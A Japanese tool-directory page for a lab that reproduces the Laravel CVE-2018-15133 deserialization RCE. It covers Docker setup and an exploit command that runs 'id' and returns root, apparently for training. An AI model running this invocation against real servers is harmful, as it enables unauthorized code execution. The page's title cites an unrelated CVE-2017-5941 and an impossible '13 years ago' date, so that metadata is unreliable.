Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Lab-for-cve-2018-15133 — CVE-2017-5941 を用いたデシリアライゼーションエクスプロイトの実行 | Kitploit
ツール/GitHubGitHub/cr4zyd14m0nd137/lab-for-cve-2018-15133
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubcr4zyd14m0nd137/lab-for-cve-2018-15133

Lab-for-cve-2018-15133

CVE-2017-5941 を用いたデシリアライゼーションエクスプロイトの実行

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
13年前未レビュー

概要:

MExploiting CVE-2018-15133 デシリアライゼーション脆弱性 このエクスプロイトは、Laravel Framework 5.5.40 までおよび 5.6.x の 5.6.29 までに存在するデシリアライゼーション脆弱性を利用します。

説明

信頼できない可能性のある X-XSRF-TOKEN 値に対する unserialize 呼び出しが原因で、リモートコード実行が発生する可能性があります。これには、Illuminate/Encryption/Encrypter.php の decrypt メソッドと、phpggc の gadgetchains/Laravel/RCE/3/chain.php にある PendingBroadcast が関与します。攻撃者はアプリケーションキーを知っている必要がありますが、通常これは起こり得ません。ただし、攻撃者が以前に特権アクセスを持っていたか、以前の攻撃を成功させた場合には発生する可能性があります。

前提条件

このエクスプロイトを実行するには、マシンに以下がインストールされている必要があります:

  • ホストOS上のDocker https://docs.docker.com/desktop/install/windows-install/
  • このDockerマシン https://hub.docker.com/r/kozmico/laravel-poc-cve-2018-15133
  • このリポジトリのエクスプロイト。
  • 攻撃者マシン。この場合、VMwareでブリッジモードで実行されている Kali Linux マシンを使用します。

再現手順:

  1. Docker をダウンロードしてインストールします。

  2. 管理者として Docker を開きます。

  3. cmd を開き、Docker マシンをプルします。

docker pull kozmico/laravel-poc-cve-2018-15133

  1. Docker マシンを起動します:

docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133

  1. Docker を開き、コンテナを起動します:

これにより Laravel マシンが起動します。 ブラウザでマシンを開いて、マシンが動作していることを確認してください。 IP とポートを使用して確認できます。Windows で IP を確認するには: ipconfig Linux では ifconfig

  1. Docker の実行に問題がある場合は、Docker を使用するために次のコマンドを実行する必要があるでしょう

wsl --set-default-version 2 wsl --update

  1. この時点で、すべてがセットアップされているはずです。残るはエクスプロイトの実行だけです。

エクスプロイトの実行

  1. エクスプロイトファイルをマシンにダウンロードします。

  2. ターミナルを開き、エクスプロイトファイルが置かれているフォルダーに移動します。

  3. 以下のコマンドを実行してサーバーをエクスプロイトします:

./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id" これにより、攻撃対象のマシンの ID を含む応答が返されます。同様のコマンドを使用して、フォルダーの取得やその他のタスクも実行できます。

応答: uid=0(root) gid=0(root) groups=0(root)

結論

この脆弱性を通じて、フレームワークを最新の状態に保つことの重要性を確認できました。これらのツールにはセキュリティ上の欠陥が存在する可能性があり、広く使用されているため、最新の状態に保たなければリスクにさらされます。

参照:

https://github.com/0xSalle/cve-2018-15133

ツールをダウンロード